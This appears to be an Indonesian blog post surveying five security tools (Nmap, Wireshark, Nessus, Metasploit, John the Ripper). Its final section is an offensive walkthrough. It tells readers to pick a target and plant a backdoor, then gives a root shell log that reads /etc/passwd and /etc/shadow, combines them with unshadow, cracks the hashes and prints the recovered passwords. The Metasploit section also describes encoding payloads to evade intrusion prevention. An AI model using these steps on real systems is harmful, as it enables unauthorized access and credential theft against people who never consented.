Inilah 5 Software Yang Sering Dipakai Oleh Para Hacker Windows - AGUSPALBENO.COM web page hit counter

Inilah 5 Software Yang Sering Dipakai Oleh Para Hacker Windows

aguspalbeno.com- Setiap hacker, tentunya memiliki beberapa hack tools untuk membantu aksi mereka. Hack tools untuk sistem operasi Windows dan Linux sudah banyak sekali beredar di dunia maya, beberapa hack tools tersebut memang didesain secara khusus dengan tujuan yang khusus pula. Di mana masing-masing punya kelebihan dan kekurangan.

Maka dari itu, kali ini saya telah membuat daftar 5 software hacking tools gratis terbaik untuk Windows dan Linux. Dilansir dari Prophethacker, dengan hack tools tersebut kamu bisa belajar melakukan berbagai trik hacking. Tentunya, artikel ini hanya ditunjukkan untuk menambah wawasan pengetahuan dan juga media belajar. Langsung saja, inilah 5 hack tools gratis terbaik untuk OS Windows dan Linux.

1.Nmap (“Network Mapper”)

aguspalbeno-nmap

aguspalbeno-nmap

merupakan sebuah tool open source untuk eksplorasi dan audit keamanan jaringan. Ia dirancang untuk memeriksa jaringan besar secara cepat, meskipun ia dapat pula bekerja terhadap host tunggal. Nmap menggunakan paket IP raw dalam cara yang canggih untuk menentukan host mana saja yang tersedia pada jaringan, layanan (nama aplikasi dan versi) apa yang diberikan, sistem operasi (dan versinya) apa yang digunakan, apa jenis firewall/filter paket yang digunakan, dan sejumlah karakteristik lainnya. Meskipun Nmap umumnya digunakan untuk audit keamanan, namun banyak administrator sistem dan jaringan menganggapnya berguna untuk tugas rutin seperti inventori jaringan, mengelola jadwal upgrade layanan, dan melakukan monitoring uptime host atau layanan.

Cara Menggunakan Nmap

Berikut beberapa contoh teknik yang dapat digunakan menggunakan nmap.

1. Memeriksa port yang terbuka
nmap<host/IP target>

2. Memeriksa spesifik port pada mesin target
nmap -p <host/IP target>

3. Memeriksa service yang berjalan pada port
nmap – sV <host/IP target>

4. Memeriksa port mesin target dalam 1 segmen jaringan
nmap <host/IP target>

5. Mengidentifikasi sistem operasi mesin
nmap -O <host/IP target>

2.Wireshark

aguspalbeno-Wireshark

aguspalbeno-Wireshark

Wireshark merupakan salah satu dari tool Network Analyzer yang biasa digunakan oleh Network Administrator pemecahan masalah jaringan, analisis, perangkat lunak dan pengembangan protokol komunikasi, dan pendidikan. Awalnya bernama Ethereal, dan pada Mei 2006 proyek ini berganti nama menjadi WIreshark karena masalah merek dagang. Bahasa Pemrograman yang digunakan adalah bahasa C dengan lisensi public umum GNU. Wireshark banyak disukai karena interfacenya yang menggunakan Graphical User Interface (GUI) atau tampilan grafis. Seperti namanya, Wireshark mampu menangkap paket-paket data/informasi yang bertebaran dalam jaringan yang kita “intip”. Semua jenis paket informasi dalam berbagai format protokol pun akan dengan mudah ditangkap dan dianalisa. Karenanya tidak jarang tool ini juga dapat dipakai untuk sniffing (memperoleh informasi penting spt password email atau account lain) dengan menangkap paket-paket yang berseliweran di dalam jaringan dan menganalisanya. Untuk menggunakan tool ini pun cukup mudah. Kita cukup memasukkan perintah untuk mendapatkan informasi yang ingin kita capture (yang ingin diperoleh) dari jaringan kita.

 

3.Nessus

aguspalbeno-Nessus

aguspalbeno-Nessus

Nessus dibuat oleh Renaud Deraison pada tahun 1998. Nessus adalah salah satu scanner keamanan jaringan yang harus digunakan oleh administrator system. Nessus merupakan sebuah software scanning, yang dapat digunakan untuk meng-audit kemanan sebuah sistem, seperti vulnerability, misconfiguration, security patch yang belum diaplikasikan, default password, dan denial of serviceNessus berfungsi untuk monitoring lalu-lintas jaringan.

Dikarenakan fungsi dari Nessus dapat digunakan untuk mendeteksi adanya kelemahan ataupun cacat dari suatu sistem maka Nessus menjadi salah satu tool andalan ketika melakukan audit keamanan suatu sistem. Sebelum Nessus versi 3, aplikasi ini bersifat open source dan menjadi salah satu primadona di dunia open source. Namun sekarang mulai Nessus versi 3 oleh Teenable Security dijadikan sebagai aplikasi propietary dan closed source

Nessus dapat digunakan untuk melakukan audit sebagai berikut:

    •   credentialed and un-credentialed port scanning.
    •  network based vulnerability scanning.
    • credentialed based patch audits for Windows and most UNIX platforms.
    • redentialed configuration auditing of most Windows and UNIX platforms.
    • robust and comprehensive credentialed security testing of 3rd party applications.
    • custom and embedded web application vulnerability testing.
    • SQL database configuration auditing.
    • software enumeration on Unix and Windows.
  • Testing anti-virus installs for out-of date signatures and configuration errors.

4. Metasploit

aguspalbeno-Metasploit

aguspalbeno-Metasploit

Metasploit adalah sebuah proyek keamanan komputer yang menyediakan informasi tentang kerentanan keamanan dan bantuan dalam pengujian penetrasi dan pengembangan signature IDS.

Yang paling terkenal sub-proyeknya adalah open source, Metasploit Framework, alat untuk mengembangkan dan melaksanakan memanfaatkan kode terhadap mesin target jarak jauh. sub-proyek penting lainnya termasuk database Opcode, shellcode arsip dan penelitian terkait.

Metasploit terkenal dengan anti-forensik dan evasion tools, beberapa di antaranya dibangun ke dalam Metasploit Framework.

Metasploit dibuat oleh H. D. Moore pada tahun 2003 sebagai alat jaringan portabel menggunakan Perl. Pada tahun 2007, Framework Metasploit telah benar-benar ditulis ulang di Ruby. [3] Pada tanggal 21 Oktober 2009, Proyek Metasploit mengumumkan [4] bahwa telah diakuisisi oleh Rapid7, sebuah perusahaan keamanan yang menyediakan solusi manajemen kerentanan terpadu.

 

Seperti produk   Metasploit dapat digunakan untuk menguji kerentanan sistem komputer atau untuk masuk ke sistem remote. Seperti banyak alat-alat keamanan informasi, Metasploit dapat digunakan untuk kegiatan yang sah dan tidak sah. Sejak akuisisi Metasploit Framework, Rapid7 telah menambahkan dua edisi eksklusif inti terbuka yang disebut Metasploit Express dan Metasploit Pro.

Muncul posisi Metasploit sebagai de facto exploit kerangka pembangunan, menyebabkan pelepasan advisories kerentanan software, sering disertai oleh pihak ketiga Metasploit memanfaatkan modul yang menyoroti Exploitability, risiko dan remediasi bug tertentu. Metasploit 3.0 mulai memasukkan alat fuzzing, digunakan untuk menemukan kerentanan software, bukan hanya exploit bug yang diketahui. jalan ini dapat dilihat dengan integrasi lorcon nirkabel (802.11) toolset ke Metasploit 3.0 pada November 2006. Metasploit 4.0 dirilis pada Agustus 2011.

 

 

Metasploit Framework

 

Langkah-langkah dasar untuk exploit system menggunakan Framework meliputi:

  • Memilih dan mengkonfigurasi exploit (kode yang memasuki sistem target dengan mengambil keuntungan dari salah satu bug tersebut; sekitar 900 eksploitasi yang berbeda untuk Windows, Unix / Linux dan Mac OS X ).
  • Opsional memeriksa apakah sistem target yang dimaksud rentan terhadap eksploitasi
  • Memilih dan mengkonfigurasi payload (kode yang akan dieksekusi pada sistem target jika berhasil masuk, misalnya, remote shell atau server VNC).
  • Memilih teknik pengkodean sehingga sistem intrusi pencegahan (IPS) mengabaikan payload dikodekan.
  • Mengeksekusi exploit
  • Pendekatan modular ini memungkinkan kombinasi dari setiap yang exploit dengan payloads apapun -adalah keuntungan utama dari Framework. Hal ini memfasilitasi tugas penyerang, exploit writers dan payload writers.

 

Metasploit berjalan pada Unix (termasuk Linux dan Mac OS X) dan pada Windows. Metasploit Framework dapat diperpanjang untuk menggunakan add-ons dalam berbagai bahasa.

 

Untuk memilih exploit dan payload, beberapa informasi tentang sistem target diperlukan, seperti versi sistem operasi dan layanan jaringan yang terpasang. Informasi ini dapat diperoleh dengan port scanning dan OS fingerprinting tools seperti Nmap. Kerentanan scanner seperti NeXpose, Nessus, dan OpenVAS dapat mendeteksi kerentanan sistem target. Metasploit dapat mengimpor kerentanan data scanner dan membandingkan kerentanan yang diidentifikasi  exploit modul untuk exploit yang akurat.

Metasploit Payload

Metasploit saat ini memiliki lebih dari 438 payloads. Beberapa darinya adalah:

    • Perintah shell memungkinkan pengguna untuk menjalankan script koleksi atau menjalankan perintah sewenang-wenang terhadap tuan rumah.
    • Meterpreter memungkinkan pengguna untuk mengontrol layar perangkat menggunakan VNC dan untuk browsing, upload dan download file.
  • payloads dinamis memungkinkan pengguna untuk menghindari pertahanan anti-virus dengan menghasilkan payloads yang unik.

5.John The Ripper

aguspalbeno-John-The-Ripper

aguspalbeno-John-The-Ripper

John The Ripper adalah suatu cracker password yang cepat yang tersedia pada banyak platfom, antara lain UNIX, Windows, DOS, BeOS dan OpenVMS. Tujuan utama dari John The Ripper adalah untuk mendeteksi kelemahan password pada sistem UNIX (termasuk Linux). John The Ripper merupakan program yang dapat membantu administrator menentukan kelayakan suatu password. Namun John The Ripper juga digunakan oleh pihak-pihak yang tidak berkepentigan untuk mendapatkan password seorang user. Situs resmi John The Ripper berada di http://www.openwall.com/john.

instalasi John the Ripper pada windows dan saya akan membahas beberapa tipe dasar serangan dan hal-hal yang dapat Anda lakukan dengan John the Ripper. Artikel ini akan cukup panjang dan saya coba menjelaskan dengan bahasa ala kadarnya yang saya harap dapat dimengerti.

Beberapa tips yg akan mempermudah saat menginstal John the Ripper pada windows

  1. Simpan di C:/ , jangan di program files maupun folder apapun.
  2. Ketika menginstal mungkin akan terlihat seperti C: / John/john1701 / dll Pindahkan semuanya keluar dari folder john1701 dan masuk ke folder pertama. Kemudian hapus john1701.
  3. Sekarang ketika Anda masuk ke drive C anda dan membuka folder john, Anda akan melihat kedua folder doc untuk menjalankan, bukan john1701
  4. Dalam run folder Anda akan melihat aplikasi “john-386″ atau “john-sesuatu”. Hanya ganti nama ke “john”

Untuk menjalankan JTP, kita membukanya melalui garis perintah ms-dos

Go Start, run, dan ketik cmd

ketikkan perintah ini: cd C: / john / run

Sekarang kita masuk ke bebrapa jenis attack melalui JTP.

-Bruteforce Attack-

Pertama saya akan menunjukkan modus JTP bruteforcing. mode ini adalah mencoba setiap kombinasi yang memungkinkan dari huruf (baik besar dan huruf kecil), angka, simbol atau kombinasi dari tiga sampai menemukan password. Sebelum saya memberitahu Anda bagaimana untuk melakukannya, kita harus mengambil hash (Saya akan menggunakan bentuk: CRjRYEn9g3PUc dari atas), menyalin dan masa di notepad, dan simpan di direktori “run” dalam John the Ripper sebagai file txt. Saya menyebutnya hash.txt. Salah satu cara untuk melakukan serangan jenis ini adalah untuk ketik “hash.txt john” (semua perintah tanpa tanda kutip) dan tekan enter. Ini akan mulai mencoba bruteforce password. Cara lain adalah dengan drag file hash.txt dan drop pada aplikasi john (ini akan dilakukan di folder run). Kekurangan dari bruteforce attack adalah memerlukan waktu yang sangat lama, tapi proses bisa dihentikan dengan mengetik perintah “ctrl + C”.

-Bruteforce Attack with conditions-

Cara ini lebih singkat. Jadi jika Anda berpikir password hanya berisi huruf Anda dapat menggunakan perintah “john-i: alpha hash.txt”, jika Anda berpikir password hanya berisi angka yang Anda dapat menggunakan perintah “john-i: hash.txt digit”, Anda juga dapat menggunakan perintah “john-i: semua hash.txt” untuk menebak password yang menggunakan kedua huruf dan angka.

-Dictionary Attack-

Cara ini dilakukan saat kita berhadapan dengan password cengan kombinasi yang panjang. tetapi metode ini lebih cepat dibandingkan apabila kita menggunakan bruteforce attack, tetapi membutuhkan ketelitian, karena kita perlu membuat daftar kata (sesuai kamus) dan jtp akan mencocokan setiap huruf yang sesuai dengan daftar yang telah kita buat.

 

cara penggunaan :

Pertama-tama carilah sebuah target yang kalian suka lalu terserah cara kalian untuk memasang backdoor.
Carilah file “passwd” dan “shadow”,biasanya letak passwd dan shadow ada di /etc/passwd dan /etc/shadow lalu terserah kalian mau diupload atau dikerjakan dalam shell file “passwd” dan “shadow” untuk dicrack.

sekarang go to the point :
[root@D-and~ tmp]# wget
http://www.openwall.com/john/f/john-1.7.2.tar.gz
[root@D-and~ tmp]# ls
. radsess.13217 radsess.15352 radsess.26504
.. radsess.13221 radsess.15377 radsess.26508
.bash_history radsess.13252 radsess.15505 radsess.26516
.bash_logout radsess.13257 radsess.15509 radsess.26520
.bash_profile radsess.13261 radsess.15510 radsess.29908
.bashrc radsess.13262 radsess.15517 radsess.29909
.emacs radsess.13269 radsess.15521 radsess.29935
.gtkrc radsess.13273 radsess.15525 radsess.29940
.kde radsess.13277 radsess.15627 radsess.29946
.screenrc radsess.13278 radsess.15631 radsess.30573
.webmin radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585
[root@D-and~ tmp]# tar -zxvf john-1.72.tar.gz
john-1.72/src/AFS_fmt.c
john-1.72/src/BF_fmt.c
john-1.72/src/BF_std.c
john-1.72/src/BSDI_fmt.c
john-1.72/src/DES_bs.c



john-1.72/doc/OPTIONS
john-1.72/doc/README
john-1.72/doc/RULES
john-1.72/README
udah selesai dicompile kita cek, folder paman john kita yang tercinta

[root@D-and~ tmp]# ls
[root@D-and~ tmp]# ls
. radsess.13213 radsess.15348 radsess.26500
.. radsess.13217 radsess.15352 radsess.26504
.bash_history radsess.13221 radsess.15377 radsess.26508
.bash_logout radsess.13252 radsess.15505 radsess.26516
.bash_profile radsess.13257 radsess.15509 radsess.26520
.bashrc radsess.13261 radsess.15510 radsess.29908
.emacs radsess.13262 radsess.15517 radsess.29909
.gtkrc radsess.13269 radsess.15521 radsess.29935
.kde radsess.13273 radsess.15525 radsess.29940
.screenrc radsess.13277 radsess.15627 radsess.29946
.webmin radsess.13278 radsess.15631 radsess.30573
john-1.72 radsess.13287 radsess.15632 radsess.30577
john-1.72.tar.gz radsess.13291 radsess.15661 radsess.30578
makewhatiswP9Kbd radsess.13292 radsess.15665 radsess.30585

[root@D-and~ tmp]# cd john-1.72
[root@D-and~ john-1.72]

setelah kita masuk…kita langsung cari folder src
[root@D-and~ john-1.72]# ls
. .. README doc run src
[root@D-and~ john-1.72]# cd src
[root@D-and~ src]# ls
. alpha.h formats.h mips32.h single.c
.. batch.c getopt.c mips64.h single.h
AFS_fmt.c batch.h getopt.h misc.c sparc.S
………
………
Makefile detect.c math.c rules.c x86-mmx.h
Makefile.dep external.c math.h rules.h x86.S
alpha-4k.h external.h memory.c signals.c
alpha.S formats.c memory.h signals.h

kita compile dulu, dan liat jenis mesin yang ada

[root@D-and~ src]# make
To build John the Ripper, type:
make SYSTEM
where SYSTEM can be one of the following:
linux-x86-any-elf Linux, x86, ELF binaries
linux-x86-mmx-elf Linux, x86 with MMX, ELF binaries
….
….
win32-cygwin-x86-mmx Win32, Cygwin, x86 with MMX
win32-cygwin-x86-k6 Win32, Cygwin, AMD K6
generic Any other UNIX system with gcc

[root@D-and~ src]# make generic
[root@D-and~ src]# rm -f arch.h
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer detect.c
[root@D-and~ src]# gcc -s detect.o -o detect
[root@D-and~ src]# ./best.sh “make” “DES_fmt.o DES_std.o” “MD5_std.o” “BF_std.o”
Compiling: DES benchmark (code version #1)
make[1]: Entering directory `/tmp/john-1.72/src’
[root@D-and~ src]# gcc -c -Wall -O2 -fomit-frame-pointer -funroll-loops DES_bs.c
[root@D-and~ src]# sed “s/unsigned long/ARCH_WORD/” nonstd.c > DES_bs_s.c


sampai muncul kata /run/unshadow
sampai muncul kata /run/unique
sampai muncul kata /run/unafs

pokonya gitu lah..pasti tau dong kalo selesai compile kaya apa

Selain itu kalian juga bisa dapatkan John The Ripper yang sudah di compile, tapi penulis tidak menyediakan JTR yang sudah di compile [carilah sendiri yang sudah di compile ]

Sehabis itu kita menuju ke folder run di direktory paman john.
[root@D-and~ src]# cd ..
[root@D-and~ john-1.72]# cd run
[root@D-and~ run]# ls
. digits.chr lanman.chr unshadow
.. john mailer unafs
alpha.chr john.pot passwd.1st unique

kaya gitu lah kira2 munculnya )

setelah itu kita cari letak passwd dan shadow
[root@D-and~ run]# whereis passwd
passwd: /usr/bin/passwd /etc/passwd /etc/passwd.OLD
/usr/share/man/man1/passwd.1.gz
/usr/share/man/man5/passwd.5.gz

Hmm.. ada tuh /etc/passwd,
kemudian gunakan cara yang sama untuk mencari file shadow ~ penulis telah mencoba beberapa shell dan memang letak passwd dan shadow di /etc/passwd dan /etc/shadow. File passwd emang bisa diread oleh siapa saja, sedang file shadow tidak bisa..diperlukan access root untuk mengambil 2 data tersebut, sebab file passwd dan shadow telah diencrypt.

Nah sekang kita masuk ke tahap untuk mendecrypt password, alias “CRACK PASSWORD”
[root@D-and~ run]# ./unshadow /etc/passwd /etc/shadow > passwd.1

maksudnya file passwd dan shadow di decrypt menjadi 1 file bernama passwd.1

[root@D-and~ run]# cat passwd.1
root:$1$??A5?wMG$MtD3gClDSs2//g6b.Ri/a/:0:0:root:/root:/bin/bash
bin:*:1:1:bin:/bin:/sbin/nologin
daemon:*:2:2:daemon:/sbin:/sbin/nologin
adm:*:3:4:adm:/var/adm:/sbin/nologin
lp:*:4:7:lp:/var/spool/lpd:/sbin/nologin
….
johnl:$1$fWkgxJYA$7DP..k060XiXpfLlQThFd/:504:500::/home/johnl:/bin/bash
chrisl:$1$AaSlFOUP$yoCJ2ZvqvDjwxLl0SkTAQ.:505:500::/home/chrisl:/bin/bash
turner:$1$p.lFHE.e$12uUTK3WMSRa.4Hgm15Ti/:506:506::/home/turner:/bin/bash
williams:$1$0egmDfIs$Bqes1nBH9vYBf6yXAUKFQ0:507:500::/home/williams:/bin/bash
Setelah itu kita jalankan berbagai macam perintah Paman John contohnya :

Keterangan meng-Crack Password yang sudah di decrypt :

  1. menggunakan -i:alpha
    [root@D-and~ run]# ./john -i:alpha passwd.1 &
    maksudnya kita crack passwd.1 dan disimpan dibackground, jadi tinggalin aja selama paman john mengcrack password untuk kita, kita bisa ngeroot ntar dia muncul kaya gini kalo berhasil
    [root@D-and~ run]# ./john -i:alpha passwd.1 &
    Loaded 2 passwords with 2 different salts (Standard DES [24/32 128K])
    watson (root)
    johnl (summer)
  2. menggunakan -single <== kita menggunakan paman john secara powerfull emang agak lambat tapi dia secara teliti mengecek passwordnya )
    [root@D-and~ run]# /john -single passwd.2
  3. kita ingin mengecrack password root / user saja

[root@D-and~ run]# ./john -i:alpha -user:0 passwd.1

atau

[root@D-and~ run]# ./john -i:alpha -user:500 passwd.1

untuk mengecek hasil password yang kita crack, dapat menggunakan

[root@D-and~ run]# ./john -show passwd.1
[root@D-and~ run]# ./john -show passwd.3
root:watson:0:0:root:/root:/bin/bash
coda:tools:500:500:CODA Manager:/home/coda:/bin/bash
adam:myrtle:501:500::/home/adam:/bin/bash
herschel:chester:502:500::/home/herschel:/bin/bash
johnl:summer:504:500::/home/johnl:/bin/bash
chrisl:turtle:505:500::/home/chrisl:/bin/bash
turner:account:506:506::/home/turner:/bin/bash
williams:ronald:507:500::/home/williams:/bin/bash

8 passwords cracked, 1 left
artinya user root memiliki password watson
user coda memiliki password tools
user adam memiliki password myrtle